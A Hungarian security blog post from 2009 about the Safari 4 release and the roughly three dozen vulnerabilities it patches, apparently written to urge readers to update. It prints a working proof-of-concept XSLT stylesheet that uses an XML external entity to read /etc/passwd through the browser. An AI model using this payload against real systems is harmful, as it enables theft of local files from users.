Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Safari 4

2009.06.09. 08:32 | buherator | Szólj hozzá!

"A fülek elhelyezését megváltoztatták, de egyébként alig történt változás a tesztverzióhoz képest."

Nos, ezzel azért vitatkoznék:

A végleges verzió kb. három tucat, több esetben kritikus vagy extrém kritikus súlyosságúnak minősített biztonsági problémát orvosol. Ezek között a már jól megszokott,  WebKit-et, CoreGraphics-t és libxml-t érintő, kódfuttatásra alkalmas sebezhetőségeken túl megtalálhatók még olyan ínyencségek is, mint a Chris Evans által felfedezett, helyi fájlok olvasását lehetővé tevő problémák.

Ezek közül a leguniverzálisabb az alábbi stíluslap megadásával használható ki:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
 <html>
 <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
 </body>
 </html>
</xsl:template>
</xsl:stylesheet>

 

A böngészőben ezen kívül megjelent egy Clickjacking-védelmi technológia is, valamint számos kevésbé súlyos, pl. cross-site scriptingre alkalmat adó hiba is javításra kerül. Így az új verzióra történő frissítés nem csak azoknak fontos, akik eddig nem voltak megelégedve a "fülek elhelyezésével".

Az Apple (a Microsofttal együtt) egyébként még számos termékéhez kiadott a mai napon javításokat, ezekről - ha minden jól megy - egy későbbi posztban számolok majd be.

Címkék: apple safari patch clickjacking

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.